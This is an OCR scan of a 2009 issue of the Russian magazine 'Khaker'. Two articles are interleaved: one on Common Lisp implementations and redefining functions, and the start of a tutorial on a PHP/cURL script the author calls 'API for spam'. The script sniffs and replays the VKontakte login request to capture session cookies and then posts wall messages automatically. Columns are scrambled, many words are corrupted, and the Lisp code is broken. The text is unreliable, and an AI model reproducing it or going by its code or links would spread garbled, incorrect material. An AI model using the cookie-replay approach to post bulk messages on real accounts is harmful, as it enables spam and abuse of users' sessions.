белых халатах?" Подобный вопрос порой за
и
+++
для символьных вычислений, а значит, для
разработки экспертных систем и других
«Адепты Лиспа
~
098,
ХАКЕР
06/126/09
i
I
I
в своем распоряжении набор «кнопочек, пимпочек» и всякой подобной ерунды для
гатпредставляет собой бесплатную редакцию платной системы; здесь содержится все не
обходимое
-
и GUI-кОНСТруктОр, И генерация
ехе-шников.
Обе системы ставятся на
Windows, Linux,
MacOS, FreeBSD [оцени масштабы). Повоз ившись с бесплатными версиями, тебе нужно будет решить: отдаватьли свои кровные за
полноценные редакции? Например, на мо мент написания статьи самая дешевая версия
LispWorks [для коммерческогоиспользо вания) стоила $1500. Но не стоит впадать в панику [а лишь ощути серьезность и мощь от раслиl- существуют и полностью бесплатные альтернативы,
причем, весьма качественные.
Если ты заядлый «виндузятник»,
-
«LISP - КРАЙНЕ ИНТЕРЕСНАЯ ШТУКА. ТРЕБУЕТ, КОНЕЧНО, ПОЛНОГО ПЕРЕОСМЫСЛЕНИЯ ЖИЗНЕННОГО ПУТИ И ПОГРУЖЕНИЯ
Епtег и смотри результат вычисления В ответе интерn ретатора.
ПРАКТИКА. ПЕРЕОПРЕДЕЛЯЕМ ОДИН ИЗ МЕХАНИЗМОВ ЛИСПА Итак, чтобы лучше понять суть, создадим необходимый контекст для дальнейшего изложения. Допустим, нам нужно создать
какую-либо рекурсивную функцию. В качестве примера у нас выступитфункция вычисления факториала:
(деЕип
х)
1
(* х
ДАО, НО ВСЕ-ТАКИ
тебе нужно
factoria1(x)
(if (zerop
В ИЗНАЧАЛЬНОЕ ИНТЕРЕСНАЯ».
» coding
(factoria1 (1-
скобок, среда програнмированияЭТо
сделает за нас
сколько основательно разработчики подошли
в себя Лисп-систему SBCL, под названи
к вопросу переносимости. Вот, например,
> 120
ем "CUSP", по адресу: httg:l/bitfaLJna.com/
список архитектур, на которые они ориентиру
projects/CLJ5p. Кстати о SBCL. Скачать ее мож
ются; Х86, АМD64, РРС,
Eclipse, включающий
>
SPARC, Alptla, MIPSbe,
:)
Еас
to.C ia1
(factoria1 5) ;
раздобыть nлагин для
х)))))
не СТОИТ заниматься подсчетом
про верка
А теперь представимсебе, что необходимо
но с httр:l/www.sЬсl.огg/рlаtfогm-tаЫе.html.
М IPSle. А что насчет операционных систем?
эту функциональность!Функциональный
Сходить по этой ссылке я советую в любом
Списоктакже внушает почтение:
объект) связать с другим символом. В смысле,
случае, хотя бы для того, чтобы посмотреть, на
Dагwiп!Мас OS Х], Sоlапs, FгееВSD, NetBSD,
не конкретно именно зту функциональность,
LinLJx,
OpenBSD, Windows. Впечатляет, не правда
а вообще, какую-либофункциональность,
ли? Ноучти, что под неистребимый Windows
определеннуюранее и связанную с каким
ДЕСЯТЬ РЕЦЕПТОВ ЭЛИI<СИРА
портированиееще не завершено [причем,
либо символом, Зачем? ЭТО во многом зависит
только под архитектурух861. Главное, чего
от нашей фантазии, Сможем найти смысл в
МОЛОДОСТИ ЛИСПА
Итак, SBCL - это Лисп-система [не среда
можем осуществить это следующим образом:
ВЕЧНОЙ
L
Единообразный и простой синтаксис
пока нет в Wlпdоws-версии, -
многопоточно
возможности переназначатьфункциональный
сти. Все остальное должно работать на «ура»,
объект, эначит, будем использовать;если нет,
хотя я, помнится, так и не смог побороть глюк
- ну значит не судьба,
библиотеки
ASDF-INSTALL,
предназначен
И все-таки, чем бы нам это могло помочь?
ной для загрузки и компиляции библиотек из
Допустим, у нас есть чужой код, в который нет
общего хранилища Лисп-исходников [смотри
времени/желания влезать, но скорректиро
http://cliki netJ,
вать его работу нужно, просто позареэ. Мы
разработкиl, и для экспериментов с Соmmоп
1, Ввести в систему новый символ kкажем, 'ВI
Lisp' ом ее может быть вполне достаточно.
и сохранить в нем фун кциональный объект,
Для серьезных разработокя тебе рекомендую
связанный с неким символом kкажем, 'А) и
добыть модуль к редактору Emacs
поведение которого требуется скорректиро
- SLIME,
(облегчает генерацию кода макросами),
Самая что ни на есть крутая и бесплатная
вать.
2.... Макросы
комбинация
2. Определить новую функцию, которая осу
вреivlени компиляции на
-
это
«EMACS - SLIME - SBCL»
самом Лиспе,
SLIME можно взять отсюда: httр:l/соmmоп
ществляет какие-либо нужные нам действия,
;i, Определениеи переопределениефунк
lisр.пеt/огоjесt/slimе. Если ты хочешь все и
дополняющиедействия функционального
ций во время выполнения,
сразу, то можешьскачать один из вариантов
объекта [связанного с А а теперь еще и с
~ Компиляцияи выполнениекода, сгене
LispBox здесь: httр:l/соmmоп-lisр.пеt/ргоjесt/
'В], а также действия этого функционального
рированногов run-time,
lispbox или здесь: http:Ugigamol1keys.com/
объекта (этого самого - связанного с 'А и .8).
5.., Определение
book/lispbox.
языков с синтаксисом под
При определении этой функции для вызова функции изначальной нужно пользоваться
ДИАЛОГ K.[IACCA С СЕРВЕРОМ «ВКОНТАКТЕ» ПРИ УСПЕШНОИ ОТПРАВКЕ НАСТЕННОГО СООБЩЕНИЯ ДРУГУ
о
~. ~ 61<ОА : реГI'<:"ТР~Ц!o'I~ ; ПОflОЩЬ
_
Добро ao:м:rr... noaaTb
rr.:w... ,,,,,.
~.J'f(Io
n!)J_",,/ •. f> ~'ln.
l8]
mKOHT~~~e_ """" ~
.1'1[1 CL~ 2.~501~~)
"~~t~kt~ .....
~~",.. ~t.;
l2:::SJ
О'51ТО
Tt)'.I"t>,'lJ:I<::I)IoXJ
6n0.'"
ГlpJDl1ro:1
po!.<:МI<';;
/lМ'ОНТllOCТгClW06-ZJ:I09
ВИД СТРАНИЦЫ АВТОРИЗАЦИИ В СОЦИАЛЬНОЙ
СЕТИ
-'+++
у друзей
- много ЛИЧНЫХ праЗДНИКОIJ. Поздравлять их вручную
сущая пытка, позтому я предлагаю тебе написать скрипт, который будет делать зто за нас. Ниже я покажу. как написать подобный скрипт с использованием
КОД ФУНК'ЦИИ FR_REC() ИЗ КЛАССА «AFO RS» дЛ Я -'+++
--+++
ПОЛУЧЕН,ИЯ
Curl
и РНР. Назвал я его банально: «API [ог
шем
-
просто
Spam",
а 8 дальней
«afors».
ШАГ1.
ПОДХОД И ФУНКЦИОНАЛКЛАССААFОRS.
АВТОРИЗАЦИЯ
Поскольку <,ВКонтакте» определяетавторизированногопользо вателя по
cookies,
нам необходимо их заполучить. Как известно,
после введения логина с паролем и отправки их на опреде
СПИIСКАДРУЗЕЙ
ленный скрипт, сервер возвращаетВсе
cookies,
необходимые
для беспроблемногоиспользования ресурса. Поскольку нам
АВТ'ОРИЗИ,РОВАННОГО ПОЛЬЗОВАТЕЛЯ
необходимо продублироватьPOST -запрос от браузера к скрипту авторизации на сайте, мы его отснифаем. Техника ПрИМИТИ8на
- берем любой снифер [>1 рекомендую SmartSniff - http://www. nirsoft.netl и смотрим через него диалог браузера с сервером «ВКонтакте» прVt обращениVt к скрипту авторизации. Как видно из отснифанныхданных. авторизация прошла
public $fr_siz; i / public $fr_rnass; / /
определяен паблик- переменную
определяем паблик- переменную
успешно, и
cookies передались без проблем, Теперь давай в
точности повторим этот механизм авторизации на сервере
«ВКонтакте», используя почти все заголовки в
.,+++
POST -запросе
[в частности, ПрVtсвоим заголовку Ассерt-Епсоdiпg значение idепtitу, чтобы опустить получение данных в сжатом виде]. Это